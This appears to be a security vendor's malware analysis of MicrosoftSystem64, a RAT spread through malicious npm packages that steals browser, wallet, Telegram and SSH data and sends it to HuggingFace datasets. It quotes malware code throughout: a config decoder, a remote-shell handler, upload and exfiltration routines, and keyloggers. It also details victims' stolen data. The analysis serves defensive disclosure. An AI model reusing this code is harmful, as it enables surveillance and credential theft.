Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace

TL;DR

In early April 2026, a malicious npm package called js-logger-pack began evolving through 29 versions on the registry, progressing from a harmless probe into a full WebSocket stealer and eventually a binary dropper. SafeDep’s analysis on April 15 first documented this evolution and identified its second-stage payload: a binary called MicrosoftSystem64. A week later, JFrog Research independently reported the same campaign, highlighting its novel abuse of HuggingFace as a data exfiltration channel. Despite both disclosures, the threat remains fully active over six weeks later: our live infrastructure probe on May 28 confirmed the embedded HuggingFace token was still valid, the C2 server was accepting connections, and real victims were under active surveillance. The token has since been reported to HuggingFace for revocation.

MicrosoftSystem64 itself is an 81 MB stripped ELF binary (with Windows and macOS variants) that packages a full-featured info-stealer and remote access trojan (RAT) inside a Node.js v20.18.2 Single Executable Application (SEA). It connects to a WebSocket C2 at 195[.]201[.]194[.]107:8010, accepts 24 distinct remote commands, and exfiltrates stolen data to attacker-controlled HuggingFace datasets. It self-updates from a HuggingFace model repository, establishes persistence on all three major operating systems, and targets over 80 cryptocurrency wallet browser extensions, every Chromium and Firefox browser variant, Telegram Desktop sessions, SSH keys, and the system clipboard. It includes a cross-platform keylogger using native OS APIs (Windows SetWindowsHookEx, macOS CGEventTap, Linux xinput/evdev) and captures periodic screenshots uploaded to HuggingFace. This post provides a deep binary-level analysis of the payload’s full capabilities. The current analyzed version is 1.0.8.

Impact:

• Exfiltration of credentials from 15 browser families (Chrome, Edge, Brave, Firefox, Opera, Vivaldi, Safari, Yandex, Chromium, CocCoc, CentBrowser, Opera GX, Chrome Beta, Chrome Canary, Edge Beta).
• Theft of 80+ cryptocurrency wallet browser extension data including local storage, extension code, and wallet files.
• Telegram Desktop session hijacking via tdata folder compression and upload.
• SSH key exfiltration (id_rsa, id_ed25519, id_ecdsa, known_hosts, authorized_keys).
• Cross-platform keylogger with clipboard monitoring (1 second polling interval).
• Periodic screenshot capture and upload to HuggingFace (60 second interval).
• Remote command execution with shell access on all platforms.
• Self-updating binary with 24-hour check interval from HuggingFace.
• Persistence via Windows Scheduled Tasks, macOS LaunchAgents, Linux systemd user units and XDG autostart.

Indicators of Compromise (IoC):

Analysis

Binary Structure: Node.js SEA as an Evasion Vector

The binary is an 81 MB stripped ELF 64-bit x86-64 executable, dynamically linked against libdl, libstdc++, libm, libgcc_s, libpthread, and libc. Despite looking like a native Linux binary to file type checks, it is a Node.js Single Executable Application (SEA) built on Node.js v20.18.2. The SEA format bundles the full V8 engine, Node.js runtime, OpenSSL, and the malicious JavaScript into a single distributable binary.

1
$ file MicrosoftSystem64
2
MicrosoftSystem64: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
3
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
4
BuildID[sha1]=60ce51fbda3036749b0de656005abae18f2b3572,
5
for GNU/Linux 3.2.0, stripped

This packaging strategy gives the attacker several advantages: the payload runs without requiring Node.js on the victim machine, the JavaScript source is embedded within megabytes of V8 runtime strings making static analysis harder, and the binary presents as a native executable to endpoint monitoring tools rather than a suspicious node process. The process.title is set to MicrosoftSystem64, so process listings show a plausible-looking Microsoft service name.

Configuration and Encryption

The embedded JavaScript is bundled from dist/config.js and uses a simple XOR cipher to obfuscate hardcoded configuration values. The decryption function and key are present in cleartext:

1
var _K = [90, 60, 126, 18, 159, 75, 109, 138];
2
function _d(enc) {
3
  const buf = Buffer.from(enc, 'base64');
4
  const out = [];
5
  for (let i = 0; i < buf.length; i++) {
6
    out.push(buf[i] ^ _K[i % _K.length]);
7
  }
8
  return Buffer.from(out).toString('utf8');
9
}

The configuration block stores XOR-encrypted values alongside cleartext comments that reveal the plaintext, making deobfuscation trivial:

1
var _CFG = {
2
  // ws://195.201.194.107:8010
3
  WS: 'LU9EPbB6VL90Dk4jsXpUvnQNTiWlc127ag==',
4
  // http://195.201.194.107:8010
5
  HTTP: 'MkgKYqVkQrtjCVAgr3pDu2MIUCOvfFeyag1O',
6
  // 15000
7
  HB: 'awlOPKg=',
8
  // https://huggingface.co/jpeek998/system-releases/resolve/main
9
  BIN_URL: 'MkgKYuxxQqUySRl19iUK7DtfGzz8JELgKlkbeaZyVaUpRQ1m+iZA+D9QG3PsLh6lKFkNffM9CKU3XRd8',
10
  // 1.0.7
11
  BIN_VER: 'axJOPKg=',
12
  // jpeek998
13
  HF_USER: 'MEwbd/RyVLI=',
14
  // hf_AQgL...DjUp (redacted — token was live at time of analysis)
15
  HF_TOKEN: 'MlohU84sIc82dTpY/CgE3jdOOWD1OwnyDXYRds4bG+cUeBRH7w==',
16
};

The decoded configuration establishes: the C2 WebSocket endpoint at ws://195[.]201[.]194[.]107:8010, a heartbeat interval of 15 seconds, a HuggingFace model repository at jpeek998/system-releases for binary updates, and a HuggingFace API token for authenticated dataset uploads. The attacker left the plaintext in comments during development and never cleaned them from the production build.

C2 Communication Architecture

The agent connects to the C2 server over WebSocket with automatic reconnection using exponential backoff (1 second minimum, 10 second maximum, 500 ms jitter). On connection, it sends a heartbeat message containing a unique agentId derived from the victim’s platform, username, and machine identifier:

1
const rawAgentId = `${platformLabel}_${username || 'user'}_${machineId}`;

The heartbeat fires every 15 seconds (configured via HB). On reconnection, the agent resumes any pending uploads that failed during previous sessions, providing resilience against network disruptions.

Command and Control: 24 Remote Tasks

The binary accepts 24 distinct task types from the C2 operator, making it a full remote access trojan:

The exec_command handler is a full remote shell. On Windows it spawns powershell.exe -NoProfile -NonInteractive -Command, on Linux/macOS it uses /bin/sh -c. It supports configurable timeouts (default 60 seconds), working directory, and shell toggle:

1
async function handleExecCommand(task) {
2
  const timeout = task.timeout ?? 6e4;
3
  const useShell = task.shell ?? true;
4
  const cwd = task.cwd ? resolvePath(task.cwd) : process.cwd();
5
  // ...
6
  if (isWindows) {
7
    child = spawn('powershell.exe', ['-NoProfile', '-NonInteractive', '-Command', task.command], { cwd /* ... */ });
8
  } else {
9
    child = spawn('/bin/sh', ['-c', task.command], { cwd /* ... */ });
10
  }
11
}

Data Exfiltration via HuggingFace

The most distinctive feature of this payload is its abuse of HuggingFace as a data exfiltration backend, documented by JFrog Research. Rather than uploading stolen data directly to the C2 server (which would require significant bandwidth and storage infrastructure), the agent creates private HuggingFace datasets under the attacker’s account and commits stolen files using the HuggingFace Git LFS commit API:

1
var HF_API_BASE = 'https://huggingface.co/api';
2
var HF_SCREEN_TOKEN = _d(_CFG.HF_TOKEN);
3
var HF_SCREEN_USERNAME = _d(_CFG.HF_USER);
4

5
async function createCommit(commitUrl, accessToken, summary, operations) {
6
  // Creates a Git LFS commit to a HuggingFace dataset
7
  const authHeaders = { Authorization: `Bearer ${accessToken}` };
8
  // ...
9
}

Each victim’s data is organized into separate datasets named from the agentId and the data type (e.g., scan_wallets, scan_files, ssh_keys). The agent first ensures the dataset exists via the HuggingFace API, then uploads gzipped archives as commits. After each upload, it notifies the C2 server with metadata about the upload:

1
async function notifyServer(uploadId, datasetName, fileName, agentId, folderPath) {
2
  // POST to C2 with upload metadata so the operator knows which
3
  // HuggingFace dataset to check
4
  body: JSON.stringify({ uploadId, datasetName, fileName, agentId, folderPath });
5
}

This architecture offloads storage to HuggingFace’s infrastructure, making the exfiltration harder to detect (HTTPS traffic to a legitimate ML platform) and cheaper for the attacker to operate. The C2 server only receives lightweight notification messages while HuggingFace stores the actual stolen data.

The current binary uses the HuggingFace account jpeek998, a pivot from the earlier Lordplay account used for binary hosting in the first dropper versions.

Browser Credential Theft

The _scanBrowserProfiles function systematically targets 15 browser families across all three operating systems. On Windows it searches %LOCALAPPDATA% and %APPDATA%, on macOS ~/Library/Application Support, and on Linux ~/.config:

Windows targets: Chrome, Chrome Beta, Chrome Canary, Edge, Edge Beta, Brave, Opera, Opera GX, Vivaldi, Yandex, Chromium, CocCoc, CentBrowser, Firefox

macOS targets (same families plus): Safari

Linux targets: Same Chromium variants plus Firefox under ~/.mozilla

For each browser, the agent copies browser history files and scans for wallet extensions by matching extension directory IDs. The browser process is killed first to release database locks:

1
async function killBrowserProcesses() {
2
  // Kills chrome, brave, firefox, edge, opera, vivaldi processes
3
  // to unlock credential databases
4
}

Crypto Wallet Extension Theft: 80+ Extensions

The binary contains a hardcoded mapping of over 80 Chromium browser extension IDs to wallet names. For each installed extension found in any browser profile, it copies both the extension code directory and its localStorage data:

1
// Partial list of 80+ wallet extension IDs embedded in the binary
2
nkbihfbeogaeaoehlefnkodbefgpgknn: "MetaMask",
3
bfnaelmomeimhlpmgjnjophhpkkoljpa: "Phantom",
4
dmkamcknogkgcdfhhbddcghachkejeap: "Keplr",
5
egjidjbpglichdcondbcbdnbeeppgdph: "Trust Wallet",
6
hnfanknocfeofbddgcijnmhnfnkdnaad: "Coinbase Wallet",
7
bhhhlbepdkbapadjdcoopfcalgecefil: "Solflare",
8
aholpfdialjgjfhomihkjbmgjidlcdno: "Exodus Extension",
9
ibnejdfjmmkpcnlpebklmnkoeoihofec: "TronLink",
10
mcohilncbfahbmgdjkbpemcciiolgcge: "OKX Wallet",
11
klghhnkeealcohjjanjjdaeeggmfmlpl: "Zerion",
12
fhbohimaelbohpjbbldcngcnapndodjp: "Binance Wallet (W3W)",
13
acmacodkjbdgmoleebolmdjonilkdbch: "Rabby",
14
fijngjgcjhjmmpcmkeiomlglpeiijkld: "Talisman",
15
aflkmfhebedbjioipglgcbcmnbpgliof: "Backpack",
16
fcfcfllfndlomdhbehjjcoimbgofdnhj: "Magic Eden Wallet",
17
// ... 65+ more extensions

The complete list spans major chains: Ethereum (MetaMask, Rabby, Zerion, Rainbow), Solana (Phantom, Solflare, Backpack, Glow), Bitcoin (UniSat, Ordinals, Xverse), Cosmos (Keplr, Leap, Cosmostation), Aptos (Petra, Pontem, Martian), Sui (Ethos, Sui Wallet), Tezos (Temple), Polkadot (Polkadot.js, Talisman, SubWallet), Tron (TronLink), NEAR (Meteor, HERE), Stacks (Leather/Hiro), XRP (Crossmark), and multi-chain wallets (Trust, Coinbase, OKX, Exodus, Brave, Safe/Gnosis).

Each extension’s data is copied with a 100 MB per-file size cap and packed into a gzip archive for upload:

1
const MAX_WALLET_FILE_SIZE = 100 * 1024 * 1024;
2
async function copyWalletDir(src, dest, maxSize, maxDepth, depth = 0) {
3
  // Recursively copies wallet extension data up to maxDepth
4
  // Skips files larger than maxSize
5
}

Telegram Session Hijacking

The handleSendTdata function targets Telegram Desktop’s tdata directory, which contains session keys that allow full account takeover without credentials. The path resolution is OS-aware:

1
// macOS
2
tdataDir = path.join(os.homedir(), 'Library', 'Application Support', 'Telegram Desktop', 'tdata');
3
// Windows
4
tdataDir = path.join(appData, 'Telegram Desktop', 'tdata');

The tdata directory is compressed with gzip via packTdata() and uploaded to HuggingFace with the victim’s OS, IP address, and username as metadata:

1
async function uploadTdata(gzPath, operatingSystem, ipAddress, username) {
2
  // Uploads compressed tdata to a HuggingFace dataset
3
}

SSH Key Exfiltration

The download_ssh task exfiltrates the entire ~/.ssh directory, targeting:

1
('id_rsa', 'id_rsa.pub', 'id_ed25519', 'id_ed25519.pub', 'id_ecdsa', 'id_ecdsa.pub', 'known_hosts', 'authorized_keys');

Stolen SSH keys are packed and uploaded to a dedicated HuggingFace dataset named ssh_keys:

1
const datasetName = buildDatasetName(config.agentId, 'ssh_keys');
2
const archivePath = await packFolderToArchive(sshPath, task.uploadId);
3
await uploadToHF(archivePath, hfCfg, datasetName, fileName, task.uploadId, sshPath, config.agentId);

Cross-Platform Keylogger

The keylogger is implemented natively for each platform using OS-level input capture APIs:

Windows: Uses a low-level keyboard hook via SetWindowsHookEx (hook ID 13 = WH_KEYBOARD_LL) with GetAsyncKeyState for modifier detection. Compiled and injected as an inline C# snippet executed through PowerShell:

1
[DllImport("user32.dll")] private static extern IntPtr
2
  SetWindowsHookEx(int id, HookProc cb, IntPtr hMod, uint tid);
3
[DllImport("user32.dll")] private static extern short
4
  GetAsyncKeyState(int vKey);
5
// ...
6
hookId = SetWindowsHookEx(13, hookProc, IntPtr.Zero, 0);

macOS: Uses Core Graphics CGEventTap to create a session-level event tap that listens for keyDown events:

1
let mask: CGEventMask = (1 << CGEventType.keyDown.rawValue)
2
guard let tap = CGEvent.tapCreate(
3
  tap: .cgSessionEventTap, place: .headInsertEventTap,
4
  options: .listenOnly, eventsOfInterest: mask,
5
  callback: keyCallback, userInfo: nil) else { /* ... */ }
6
CGEvent.tapEnable(tap: tap, enable: true)

Linux: Attempts xinput test-xi2 --root first (X11 input extension), falling back to raw /dev/input evdev reading with a 24-byte input_event struct parser:

1
const INPUT_EVENT_SIZE = 24;
2
// Falls back to reading /dev/input/event* devices directly
3
while (offset + INPUT_EVENT_SIZE <= buf.length) {
4
  // Parse struct input_event { timeval, __u16 type, __u16 code, __s32 value }
5
}

The keylogger runs alongside a clipboard watcher that polls every second:

1
var CLIPBOARD_POLL_MS = 1e3; // 1 second
2
async function _startClipboardWatcher() {
3
  /* ... */
4
}

Screenshot Capture

The binary supports both on-demand and periodic screenshot capture across all platforms:

• Windows: Uses PowerShell with System.Windows.Forms.Screen and System.Drawing for BitBlt-based screen capture, with a fast path fallback
• macOS: Uses the native screencapture -x -C -t png command
• Linux: Tries multiple screenshot tools: gnome-screenshot, scrot, or X11-based capture with display environment detection

Periodic screenshots upload to HuggingFace every 60 seconds when enabled:

1
function startPeriodicScreenshotUpload(hfConfig, intervalMs = 6e4) {
2
  // Captures and uploads a screenshot every 60 seconds
3
}

Persistence Mechanisms

The binary establishes persistence on all three operating systems using the UNIT_STEM value MicrosoftSystem64:

Windows:

• Creates a scheduled task named \MicrosoftSystem64 via schtasks /create
• Sets a Run registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run

macOS:

• Creates a LaunchAgent plist at ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist
• Loads via launchctl bootstrap

Linux:

• Creates a systemd user service at ~/.config/systemd/user/MicrosoftSystem64.service
• Enables via systemctl --user enable
• Runs loginctl enable-linger for user-level persistence without login
• Creates an XDG autostart desktop entry at ~/.config/autostart/MicrosoftSystem64.desktop

The install directory is ~/.local/share/MicrosoftSystem64 on Linux, with a .registered marker file containing an ISO timestamp written on first execution.

Self-Update Mechanism

The binary checks for updates every 24 hours from the HuggingFace repository:

1
var CHECK_INTERVAL_MS = 24 * 60 * 60 * 1e3; // 24 hours
2

3
function startSelfUpdateLoop() {
4
  setTimeout(() => checkAndUpdate().catch(() => {}), 6e4); // first check at 60s
5
  updateTimer = setInterval(() => {
6
    checkAndUpdate().catch(() => {});
7
  }, CHECK_INTERVAL_MS);
8
}

The update process fetches a version file from hxxps://huggingface[.]co/jpeek998/system-releases/resolve/main using the embedded HuggingFace token, compares it against the current BINARY_VERSION (“1.0.8”), and if a newer version is available, downloads the platform-specific binary and replaces the running executable. The current binary was built against version 1.0.7 in the config but reports as 1.0.8, suggesting the version was bumped after the config was encoded.

Upload Resilience

The agent includes a persistent upload queue that survives crashes and restarts. Failed uploads are saved to disk and retried on the next successful C2 connection:

1
async function resumePendingUploads(agentId) {
2
  // On reconnect, retries all uploads that failed during previous sessions
3
}

If the local archive file is missing on retry (e.g., cleaned by antivirus), the agent re-packs the folder from the original path before retrying.

Attacker Infrastructure: Live Probe (2026-05-28)

We probed the attacker’s HuggingFace infrastructure on May 28, 2026. The findings confirm the exfiltration pipeline is actively operating with real victims.

Account Status

The attacker operates two HuggingFace accounts:

The Lordplay/system-releases repo metadata is still readable. It lists all four platform binaries (MicrosoftSystem64-linux at 85 MB, -win.exe at 67 MB, -darwin-x64 at 87 MB, -darwin-arm64 at 84 MB) and a version.txt, last modified May 18. HuggingFace disabled file access but did not remove the repo or the account.

The jpeek998 account was created on May 15, 13 days after the Lordplay repo was disabled, as a replacement exfiltration endpoint. The HuggingFace API token embedded in the binary (redacted; reported to HuggingFace for revocation) authenticated successfully as jpeek998 with read/write access to private datasets at the time of our probe.

Active Victim Data

Using the embedded token, we enumerated three private datasets under jpeek998 containing exfiltrated data from two active victims:

The screenshots are captured every 60 seconds and uploaded as JSON files containing a screenshot key with base64-encoded PNG data. We downloaded and decoded all 417 screenshots from both datasets. The following images are actual exfiltrated screenshots recovered from the attacker’s HuggingFace datasets, shown here as evidence of the active surveillance operation.

The Linux victim’s desktop shows a crypto trading terminal (MT5 connected to Binance EUR/BTC), Python scripts, and Polymarket bot notifications:

The Windows victim’s desktop shows ChatGPT, a JoinQuant algorithmic trading platform, and VS Code with multiple browser tabs open to cryptocurrency exchanges:

A later capture of the same Windows victim shows them browsing JoinQuant’s strategy backtesting interface with active trading algorithms:

Both victims are cryptocurrency traders, which aligns with the payload’s focus on stealing wallet extensions and browser credentials. The attacker is watching their screens in near real-time while simultaneously exfiltrating their credential databases.

Stolen Data Contents

The 500 MB credential archive from the Windows victim (wulin) uses a custom binary packing format (not standard tar/zip). String extraction reveals 1,097 credential files stolen from the machine, organized by a numeric index with sanitized path names.

Data stolen from user wulin (C: drive):

• SSH keys: id_rsa, id_rsa.pub, known_hosts, known_hosts.old
• Chrome Login Data, Cookies, Web Data, History, Bookmarks (Default and Profile 2)
• Edge Login Data, Cookies, Web Data, History
• Chrome and Edge Local State files (contain DPAPI-encrypted master keys)
• Claude Desktop app data (Claude-3p/Local State, Crashpad settings)
• NVIDIA app embedded browser credentials
• Various Electron app credential stores

Data stolen from user Nicolas (D: drive, second user profile or mapped drive):

• WeChat (xwechat) session data, history, and web data across multiple profiles
• HuaYoungBrowser (anti-detect browser) Login Data, Cookies, and History from multiple shop profiles (shop IDs 327099334275079, 331362951237637, 335250269933673, 335269886693379, 339596858634247)
• Remote Desktop connection files (.rdp)
• Todoist app credentials
• Telegram data

The presence of HuaYoungBrowser shop profiles suggests the victim may be running an e-commerce operation with multiple store accounts. The stealer harvested credentials from every Chromium-based application on both user profiles across two drives.

Dataset Naming Convention

The agent constructs dataset names from the victim’s agentId (derived from platform_username_machineId) and the scan type:

1
jpeek998/{platform}_{username}_{machineIdHash}              → screenshots
2
jpeek998/{platform}_{username}_{machineIdHash}_scan_files    → credential files
3
jpeek998/{platform}_{username}_{machineIdHash}_scan_wallets  → wallet data
4
jpeek998/{platform}_{username}_{machineIdHash}_ssh_keys      → SSH keys

Each dataset is created as a private HuggingFace dataset via POST hxxps://huggingface[.]co/api/repos/create. Files are uploaded as Git LFS commits using NDJSON-formatted commit operations. After each upload, the agent notifies the C2 at hxxp://195[.]201[.]194[.]107:8010/api/validate/hf-upload-complete with upload metadata so the operator knows which dataset to pull.

Attribution: The toskypi / jpeek* Cluster

Cross-referencing the attacker identifiers embedded in this binary with public threat intelligence reveals a broader campaign spanning multiple npm packages, HuggingFace accounts, and at least three months of activity.

Identity Cluster

The SSH key comment bink@DESKTOP-N8JGD6T leaked in js-logger-pack v1.1.5 is the strongest forensic anchor. JFrog Research traced this to a GitHub identity ptc-bink and a web persona whisdev, with copilot-ai.whisdev.org serving as a secondary hostname on the same C2 IP (195[.]201[.]194[.]107). The npm publisher account jpeek868 (email [email protected]) declared toskypi as the package author, a name that appears independently in kmsec.uk’s Contagious Trader campaign report under the email [email protected].

The jpeek namespace rotates numerically: jpeek868, jpeek886, jpeek895 are all linked npm accounts sharing the same Lordplay/system-releases HuggingFace infrastructure for binary staging. Additional associated npm accounts include pvnd3540749 and yggedd817513.

Attributed Malicious Packages

The same actor or closely coordinated group published at least seven malicious npm packages:

The February and March packages (polymarket-validator, changelog-logger-utilities) belong to the Contagious Trader campaign targeting cryptocurrency trading bot developers. The April pivot to js-logger-pack introduced the HuggingFace exfiltration channel. After npm took down js-logger-pack on April 22, the May packages (terminal-logger-utils and its dependents) continued distributing MicrosoftSystem64 under fresh accounts, demonstrating rapid account rotation and operational resilience.

Campaign Lineage

kmsec.uk and OX Security independently attribute this cluster to FAMOUS CHOLLIMA (also tracked as Contagious Interview), a DPRK-linked threat actor group known for targeting developers through poisoned npm packages, fake job interviews, and trojanized trading tools. The toskypi identity appears alongside approximately 20 other npm accounts in the Contagious Trader report, and kmsec.uk linked jpeek895 to the earlier BigSquatRat campaign (bigmathix, bigmathutils, axios-net) from January 2026.

The operational pattern is consistent: purpose-built throwaway npm accounts, cryptocurrency/developer tooling as lures, credential theft with a focus on crypto wallets, and infrastructure pivoting after disclosure. What distinguishes this particular iteration is the adoption of HuggingFace as both a binary CDN and exfiltration backend, a technique that makes network-level detection significantly harder since all traffic appears as authenticated HTTPS requests to a legitimate ML platform.

Conclusion

MicrosoftSystem64 is a well-engineered, multi-platform RAT that leverages HuggingFace as both a binary distribution CDN and a data exfiltration backend. The abuse of a legitimate ML platform for command-and-control infrastructure makes network-level detection challenging: all exfiltration traffic appears as authenticated HTTPS requests to huggingface.co. The 24-task C2 protocol, cross-platform keylogger, 80+ wallet extension targets, and persistent self-update loop make this a comprehensive credential theft platform operating in the open source supply chain.

Our live probe of the attacker’s infrastructure on May 28, 2026 confirmed this is not a theoretical threat: the exfiltration pipeline was actively operating, the embedded HuggingFace token was still valid, and real victims were being surveilled with screenshots captured every 60 seconds and hundreds of credential files exfiltrated. The attacker has already pivoted accounts once (from Lordplay to jpeek998) after the first repo was disabled, demonstrating operational resilience.

Organizations that installed js-logger-pack, terminal-logger-utils, ts-logger-pack, pretty-logger-utils, pinno-loggers, or any other package from the jpeek*/toskypi cluster should treat it as a full compromise: rotate all credentials, SSH keys, API tokens, and crypto wallet seed phrases on affected machines. The actor’s pattern of rapid account rotation after takedowns means new package names distributing the same MicrosoftSystem64 binary should be expected.

To detect this payload in your dependency tree before it executes, scan your projects with vet.

References

• JFrog Research: Data Exfiltration via Hugging Face
• SafeDep: Malicious npm Package js-logger-pack Ships a Multi-Platform WebSocket Stealer
• OX Security: North Korean-Linked Threat Actor Targets Developers with New npm Infostealer RAT
• kmsec.uk: Contagious Trader Campaign
• kmsec.uk: BigSquatRat Campaign (bigmathix)
• kmsec.uk: DPRK npm Research Feed
• Node.js Single Executable Applications documentation